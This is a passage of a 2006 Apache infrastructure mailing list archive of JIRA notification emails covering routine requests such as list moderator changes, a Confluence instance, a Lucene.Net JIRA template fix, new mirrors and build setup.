with ESMTP id 003C9410007 for <[email protected]>; Sun, 18 Jun 2006 13:31:30 +0000 (GMT) Message-ID: <3850987.1150637489997.JavaMail.jira@brutus> Date: Sun, 18 Jun 2006 13:31:29 +0000 (GMT+00:00) From: "Sebb (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-850) Update moderators for JMeter mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Update moderators for JMeter mailing lists ------------------------------------------ Key: INFRA-850 URL: http://issues.apache.org/jira/browse/INFRA-850 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Sebb Please can you update the moderators for the JMeter mailing lists as follows: jmeter-dev: - remove [email protected] (the address is no longer valid) + add woolfel AT AO (Peter Lin) as moderator jmeter-user: + add woolfel AT AO (Peter Lin) as moderator Thanks! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 00:17:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32964 invoked from network); 19 Jun 2006 00:17:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 00:17:00 -0000 Received: (qmail 59226 invoked by uid 500); 19 Jun 2006 00:16:56 -0000 Delivered-To: [email protected] Received: (qmail 58867 invoked by uid 500); 19 Jun 2006 00:16:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58849 invoked by uid 99); 19 Jun 2006 00:16:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 17:16:53 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 17:16:53 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EBEC9410005 for <[email protected]>; Mon, 19 Jun 2006 00:15:32 +0000 (GMT) Message-ID: <8075354.1150676132947.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 00:15:32 +0000 (GMT+00:00) From: "Ted Husted (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-851) Struts project - Create Confluence Instance MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Struts project - Create Confluence Instance ------------------------------------------- Key: INFRA-851 URL: http://issues.apache.org/jira/browse/INFRA-851 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Confluence Reporter: Ted Husted We've been migrating the WebWork wiki to Struts Action 2 at * http://confluence.twdata.org/display/WW/Home If appropriate, we would like to request a Confluence instance for the SAF2 wiki. Please also create a administrator's account for "husted". -Ted. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 00:17:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33452 invoked from network); 19 Jun 2006 00:17:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 00:17:04 -0000 Received: (qmail 59550 invoked by uid 500); 19 Jun 2006 00:16:57 -0000 Delivered-To: [email protected] Received: (qmail 58889 invoked by uid 500); 19 Jun 2006 00:16:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58873 invoked by uid 99); 19 Jun 2006 00:16:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 17:16:54 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 17:16:53 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 73A31410007 for <[email protected]>; Mon, 19 Jun 2006 00:15:33 +0000 (GMT) Message-ID: <18033928.1150676133471.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 00:15:33 +0000 (GMT+00:00) From: "Ted Husted (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-851) Struts project - Create Confluence Instance In-Reply-To: <8075354.1150676132947.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-851?page=all ] Ted Husted updated INFRA-851: ----------------------------- Component: Confluence > Struts project - Create Confluence Instance > ------------------------------------------- > > Key: INFRA-851 > URL: http://issues.apache.org/jira/browse/INFRA-851 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Confluence > Reporter: Ted Husted > > We've been migrating the WebWork wiki to Struts Action 2 at > * http://confluence.twdata.org/display/WW/Home > If appropriate, we would like to request a Confluence instance for the SAF2 wiki. Please also create a administrator's account for "husted". > -Ted. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 10:59:50 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90405 invoked from network); 19 Jun 2006 10:59:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 10:59:47 -0000 Received: (qmail 45774 invoked by uid 500); 19 Jun 2006 10:58:55 -0000 Delivered-To: [email protected] Received: (qmail 45338 invoked by uid 500); 19 Jun 2006 10:58:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45281 invoked by uid 99); 19 Jun 2006 10:58:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:58:51 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:58:51 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 37A42410005 for <[email protected]>; Mon, 19 Jun 2006 10:57:30 +0000 (GMT) Message-ID: <30065983.1150714650198.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 10:57:30 +0000 (GMT+00:00) From: "George Aroush (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-852) Lucene.Net JIRA setting is using the wrong template In-Reply-To: <23364030.1150713989769.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-852?page=all ] George Aroush updated INFRA-852: -------------------------------- One more comment while we [email protected]. Can the public project name be changed from "Lucene.NET" to "Lucene.Net"? > Lucene.Net JIRA setting is using the wrong template > --------------------------------------------------- > > Key: INFRA-852 > URL: http://issues.apache.org/jira/browse/INFRA-852 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: JIRA > Environment: JIRA setup for Lucene.Net > Reporter: George Aroush > Priority: Blocker > > Hi folks, > It looks like when JIRA was setup for Lucene.Net, the template for Jakarta Lucene was used. As a result: > 1) Issues submitted to Lucene.Net, end up generating email being sent to the Jakarta Lucene instead of Lucene.Net mailing list. > 2) After submitting an issue, they can't be edited. > This is a blocking issue as it annoys the Jakarta Lucene users and doesn't give the Lucene.Net users the ability to edit submitted issues. > Thanks, > -- George Aroush -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 11:04:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97539 invoked from network); 19 Jun 2006 11:04:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 11:04:16 -0000 Received: (qmail 70090 invoked by uid 500); 19 Jun 2006 11:02:53 -0000 Delivered-To: [email protected] Received: (qmail 69795 invoked by uid 500); 19 Jun 2006 11:02:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31731 invoked by uid 99); 19 Jun 2006 10:47:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:47:51 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:47:50 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C345C410005 for <[email protected]>; Mon, 19 Jun 2006 10:46:29 +0000 (GMT) Message-ID: <23364030.1150713989769.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 10:46:29 +0000 (GMT+00:00) From: "George Aroush (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-852) Lucene.Net JIRA setting is using the wrong template MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Lucene.Net JIRA setting is using the wrong template --------------------------------------------------- Key: INFRA-852 URL: http://issues.apache.org/jira/browse/INFRA-852 Project: Infrastructure Type: Bug Security: public (Regular issues) Components: JIRA Environment: JIRA setup for Lucene.Net Reporter: George Aroush Priority: Blocker Hi folks, It looks like when JIRA was setup for Lucene.Net, the template for Jakarta Lucene was used. As a result: 1) Issues submitted to Lucene.Net, end up generating email being sent to the Jakarta Lucene instead of Lucene.Net mailing list. 2) After submitting an issue, they can't be edited. This is a blocking issue as it annoys the Jakarta Lucene users and doesn't give the Lucene.Net users the ability to edit submitted issues. Thanks, -- George Aroush -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 11:09:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2681 invoked from network); 19 Jun 2006 11:09:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 11:09:34 -0000 Received: (qmail 82603 invoked by uid 500); 19 Jun 2006 11:05:03 -0000 Delivered-To: [email protected] Received: (qmail 81050 invoked by uid 500); 19 Jun 2006 11:04:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32648 invoked by uid 99); 19 Jun 2006 10:49:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:49:52 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 03:49:51 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 293D6410005 for <[email protected]>; Mon, 19 Jun 2006 10:48:30 +0000 (GMT) Message-ID: <97073.1150714110150.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 10:48:30 +0000 (GMT+00:00) From: "Jurriaan Duindam (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-819) New Mirror In-Reply-To: <4763192.1148460991423.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-819?page=comments#action_12416739 ] Jurriaan Duindam commented on INFRA-819: ---------------------------------------- rsync seems to be prohibited. When I try to rsync I get an error message telling me "rsync not allowed from unknown" > New Mirror > ---------- > > Key: INFRA-819 > URL: http://issues.apache.org/jira/browse/INFRA-819 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Reporter: Jurriaan Duindam > > URL: http://apache.mirror.rokscom.nl > Country: the Netherlands > [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.eu.apache.org > Approximate bandwidth 100 MBit > I have configured my HTTP server as requested yes > I have subscribed to the mirror maintainers mailing list yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 19 13:26:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84693 invoked from network); 19 Jun 2006 13:26:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2006 13:26:03 -0000 Received: (qmail 73358 invoked by uid 500); 19 Jun 2006 13:25:55 -0000 Delivered-To: [email protected] Received: (qmail 73083 invoked by uid 500); 19 Jun 2006 13:25:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72998 invoked by uid 99); 19 Jun 2006 13:25:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 06:25:53 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 06:25:52 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 11FEC410007 for <[email protected]>; Mon, 19 Jun 2006 13:24:31 +0000 (GMT) Message-ID: <6741275.1150723471068.JavaMail.jira@brutus> Date: Mon, 19 Jun 2006 13:24:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-819) New Mirror In-Reply-To: <4763192.1148460991423.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-819?page=comments#action_12416760 ] Joshua Slive commented on INFRA-819: ------------------------------------ Your IP was dennied access because you were using rsync abusively. Please check your config settings to make sure that you sync only new content no more than 4 times per day. I have removed your IP from the block list, but it will be readded if we see problems. > New Mirror > ---------- > > Key: INFRA-819 > URL: http://issues.apache.org/jira/browse/INFRA-819 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Reporter: Jurriaan Duindam > > URL: http://apache.mirror.rokscom.nl > Country: the Netherlands > [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.eu.apache.org > Approximate bandwidth 100 MBit > I have configured my HTTP server as requested yes > I have subscribed to the mirror maintainers mailing list yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 20 03:39:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60365 invoked from network); 20 Jun 2006 03:38:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 03:38:58 -0000 Received: (qmail 79663 invoked by uid 500); 20 Jun 2006 03:38:53 -0000 Delivered-To: [email protected] Received: (qmail 79391 invoked by uid 500); 20 Jun 2006 03:38:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79379 invoked by uid 99); 20 Jun 2006 03:38:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 20:38:52 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jun 2006 20:38:51 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C7227410005 for <[email protected]>; Tue, 20 Jun 2006 03:37:29 +0000 (GMT) Message-ID: <3989454.1150774649786.JavaMail.jira@brutus> Date: Tue, 20 Jun 2006 03:37:29 +0000 (GMT+00:00) From: "David Blevins (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-853) Setup ADF Faces in continuum MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Setup ADF Faces in continuum ---------------------------- Key: INFRA-853 URL: http://issues.apache.org/jira/browse/INFRA-853 Project: Infrastructure Type: Task Security: public (Regular issues) Components: VMBuild Reporter: David Blevins Priority: Minor Hey, we'd like to add a "nightly build" support to the ADF Faces (aka Trinidad) donation. Since we are using Maven2 the continuum project sounds good! I don't know if there is a special Continuum Zone for Incubator projects. Another possibility could be using the MyFace zone, since the MyFaces PMC is the *sponsor* for this project. What do you think? Thanks, Matthias -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 20 07:08:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19902 invoked from network); 20 Jun 2006 07:07:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 07:07:58 -0000 Received: (qmail 21176 invoked by uid 500); 20 Jun 2006 07:07:54 -0000 Delivered-To: [email protected] Received: (qmail 20934 invoked by uid 500); 20 Jun 2006 07:07:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20922 invoked by uid 99); 20 Jun 2006 07:07:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 00:07:53 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 00:07:52 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 94E40410006 for <[email protected]>; Tue, 20 Jun 2006 07:06:30 +0000 (GMT) Message-ID: <22969896.1150787190606.JavaMail.jira@brutus> Date: Tue, 20 Jun 2006 07:06:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-852) Lucene.Net JIRA setting is using the wrong template In-Reply-To: <23364030.1150713989769.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-852?page=all ] Brett Porter closed INFRA-852: ------------------------------ Resolution: Fixed Assign To: Brett Porter done. The only person added to lucene-net-developers is you, and all lucene-developers still have JIRA permissions on the project as well. I'd suggest you should just merge into the lucene-developers permissions after incubation. > Lucene.Net JIRA setting is using the wrong template > --------------------------------------------------- > > Key: INFRA-852 > URL: http://issues.apache.org/jira/browse/INFRA-852 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: JIRA > Environment: JIRA setup for Lucene.Net > Reporter: George Aroush > Assignee: Brett Porter > Priority: Blocker > > Hi folks, > It looks like when JIRA was setup for Lucene.Net, the template for Jakarta Lucene was used. As a result: > 1) Issues submitted to Lucene.Net, end up generating email being sent to the Jakarta Lucene instead of Lucene.Net mailing list. > 2) After submitting an issue, they can't be edited. > This is a blocking issue as it annoys the Jakarta Lucene users and doesn't give the Lucene.Net users the ability to edit submitted issues. > Thanks, > -- George Aroush -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 20 12:30:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43563 invoked from network); 20 Jun 2006 12:29:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 12:29:59 -0000 Received: (qmail 32958 invoked by uid 500); 20 Jun 2006 12:29:54 -0000 Delivered-To: [email protected] Received: (qmail 32740 invoked by uid 500); 20 Jun 2006 12:29:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32729 invoked by uid 99); 20 Jun 2006 12:29:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 05:29:53 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 05:29:52 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2DA1F410005 for <[email protected]>; Tue, 20 Jun 2006 12:28:30 +0000 (GMT) Message-ID: <22604130.1150806510156.JavaMail.jira@brutus> Date: Tue, 20 Jun 2006 12:28:30 +0000 (GMT+00:00) From: "Jeff Turner (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-805) recent Subversion change(s) not in Jira In-Reply-To: <10724977.1147707667896.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-805?page=all ] Jeff Turner resolved INFRA-805: ------------------------------- Resolution: Fixed > recent Subversion change(s) not in Jira > --------------------------------------- > > Key: INFRA-805 > URL: http://issues.apache.org/jira/browse/INFRA-805 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: JIRA > Reporter: Martin Sebor > Priority: Critical > > This change: http://svn.apache.org/viewcvs.cgi?rev=405964&view=rev > is not reflected in the issue it references: http://issues.apache.org/jira/browse/STDCXX-179 > Perhaps due to last week's svn outage? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 20 16:01:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67408 invoked from network); 20 Jun 2006 16:01:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 16:01:02 -0000 Received: (qmail 94169 invoked by uid 500); 20 Jun 2006 16:00:56 -0000 Delivered-To: [email protected] Received: (qmail 93861 invoked by uid 500); 20 Jun 2006 16:00:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93850 invoked by uid 99); 20 Jun 2006 16:00:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 09:00:54 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 09:00:53 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9690A410006 for <[email protected]>; Tue, 20 Jun 2006 15:59:30 +0000 (GMT) Message-ID: <8774574.1150819170613.JavaMail.jira@brutus> Date: Tue, 20 Jun 2006 15:59:30 +0000 (GMT+00:00) From: "Jarek W. (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-854) New PL Mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New PL Mirror ------------- Key: INFRA-854 URL: http://issues.apache.org/jira/browse/INFRA-854 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Environment: Apache/1.3.33 , Debian 3.1, 40 GB Reporter: Jarek W. * URL: http://ftp.agh.nzs.pl * Country: Poland * Contact: [email protected] * Update frequency: 6h * Rsync repository: rsync.apache.org * Approximate bandwidth: 10mbit but soon(2 weeks) gona be 100GB * I have configured my HTTP server as requested: yes * I have subscribed to the mirror maintainers mailing list: no -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 20 16:03:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68716 invoked from network); 20 Jun 2006 16:03:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2006 16:03:01 -0000 Received: (qmail 99134 invoked by uid 500); 20 Jun 2006 16:02:55 -0000 Delivered-To: [email protected] Received: (qmail 98898 invoked by uid 500); 20 Jun 2006 16:02:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98885 invoked by uid 99); 20 Jun 2006 16:02:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 09:02:54 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jun 2006 09:02:53 -0700 Received: from brutus 